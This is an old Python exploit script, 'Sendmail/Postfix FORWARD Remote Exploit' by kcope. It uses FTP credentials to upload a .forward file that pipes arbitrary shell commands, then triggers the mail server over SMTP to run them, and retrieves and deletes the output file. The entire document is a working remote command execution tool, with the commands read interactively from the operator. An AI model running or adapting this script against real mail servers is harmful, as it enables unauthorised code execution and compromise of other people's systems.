#!python # (C) 2007 kcope production from ftplib import FTP import sys import socket print "Sendmail/Postfix FORWARD Remote Exploit" print "kcope/2007 - hey alex,andi" if (len(sys.argv) != 4): print "usage: skyline.py " sys.exit() hostname = sys.argv[1] username = sys.argv[2] password = sys.argv[3] print "[+] INITIAL FTP STOR" def FTPconnect(initial): try: ftp = FTP(hostname) print ftp.getwelcome() ftp.login(username, password) if (initial): f = open(".forward", "wb") f.write("|touch /tmp/XXX\n") f.close() f = open(".forward", "rb") ftp.storbinary("STOR .forward", f) ftp.quit() f.close() except: print "[-] FTP Error. Correct Login Credentials ?" sys.exit() FTPconnect(True) print "[+] PLEASE ENTER COMMANDS TO EXECUTE" print "[+] sendmail allows a single command" print "[+] postfix allows many" print "[+] END WITH . IN A SINGLE LINE" input = sys.stdin.readline().strip() f = open(".forward", "wb") f.writelines("|" + "\"" + input + "> ~/RESULTS" + "\"" + "\n") while (True): input = sys.stdin.readline().strip() if (input == "."): break f.writelines("|" + "\"" + input + ">> ~/RESULTS" + "\"" + "\n") f.close() print "[+] FTP STOR" FTPconnect(False) print "[+] EXPLOITING BOX" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((hostname, 25)) smtpline = s.recv(1024) smtphostname = smtpline[4:smtpline.find(" ", 5)] s.close() except: print "[-] EXPLOTATION Error. Is sendmail/postfix running ?" sys.exit() try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((hostname, 25)) smtpline = s.recv(1024) print smtpline s.send("HELO eyecandy\r\n") s.recv(1024) s.send("MAIL FROM: " + username + "@" + smtphostname + "\r\n") s.recv(1024) s.send("RCPT TO: " + username + "@" + smtphostname + "\r\n") s.recv(1024) s.send("DATA" + "\r\n") s.recv(1024) s.send("." + "\r\n") s.recv(1024) s.send("quit" + "\r\n") s.recv(1024) s.close() except: print "[-] EXPLOTATION Error. Is sendmail/postfix running ?" sys.exit() print "[+] RETRIEVING RESULTS" try: ftp = FTP(hostname) print ftp.getwelcome() ftp.login(username, password) ftp.retrlines("RETR RESULTS") ftp.delete("RESULTS") except: print "[-] FTP RETRIEVE Error. Correct Login Credentials ? Sendmail / postfix accepting messages ?" sys.exit() for line in open("RESULTS"): print line f.close()